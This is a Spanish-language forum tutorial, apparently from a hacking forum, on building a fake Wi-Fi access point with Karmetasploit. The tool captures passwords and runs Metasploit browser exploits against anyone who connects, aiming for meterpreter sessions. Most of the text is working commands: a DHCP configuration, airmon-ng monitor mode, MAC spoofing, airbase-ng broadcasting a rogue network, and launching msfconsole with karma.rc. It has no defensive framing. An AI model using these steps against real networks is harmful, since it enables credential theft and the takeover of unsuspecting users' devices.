Karmetasploit sirve para crear puntos de acceso falsos, capturar contraseñas, recopilar infomación, y llevar a los ataques de navegador contralos clientes.
Cuando un usuario se conecta a nuestro AP Fake, la dirección IP la estará asignando el servicio DHCP, y posteriormente karmetasploit intentará ejecutar todos los exploits sobre la maquina objetivo en busca de alguna vulnerabilidad e intentará conseguir una sesión meterpreter.
Descargamos [Enlace externo eliminado para invitados]
Instalamos dhcpd3-server
Código: Seleccionar todo
sudo apt-get install isc-dhcp-server
Código: Seleccionar todo
#
# Sample configuration file for ISC dhcpd for Debian
#
# Attention: If /etc/ltsp/dhcpd.conf exists, that will be used as
# configuration file instead of this file.
#
#
# The ddns-updates-style parameter controls whether or not the server will
# attempt to do a DNS update when a lease is confirmed. We default to the
# behavior of the version 2 packages ('none', since DHCP v2 didn't
# have support for DDNS.)
ddns-update-style none;
# option definitions common to all supported networks...
option domain-name "10.0.0.1";
option domain-name-servers 10.0.0.1;
default-lease-time 60;
max-lease-time 72;
# If this DHCP server is the official DHCP server for the local
# network, the authoritative directive should be uncommented.
#authoritative;
# Use this to send dhcp log messages to a different log file (you also
# have to hack syslog.conf to complete the redirection).
log-facility local7;
# No service will be given on this subnet, but declaring it helps the
# DHCP server to understand the network topology.
#subnet 10.0.0.0 netmask 255.255.255.0 {
#}
# This is a very basic subnet declaration.
#subnet 10.0.0.0 netmask 255.255.255.0 {
# range 10.0.0.100 10.0.0.254;
# option routers 10.0.0.1;
#}
Ahora comenzamos poniendo nuestra tarjeta en modo monitor, en mi caso es la wlan0
Código: Seleccionar todo
airmon-ng start wlan0
Código: Seleccionar todo
ifconfig mon0 down && macchanger -r mon0 && ifconfig mon0 up
Código: Seleccionar todo
airbase-ng -P -C 30 -c 6 -e “red_falsa” mon0
Este paso anterior nos creará una nueva interfaz llamada at0 a la cual vamos a darle una ip y activamos el servidor dhcp desde otra terminal:
Código: Seleccionar todo
ifconfig at0 up 10.0.0.1 netmask 255.255.255.0
dhcpd -cf /etc/dhcp/dhcpd.conf at0
Código: Seleccionar todo
msfconsole -r karma.rc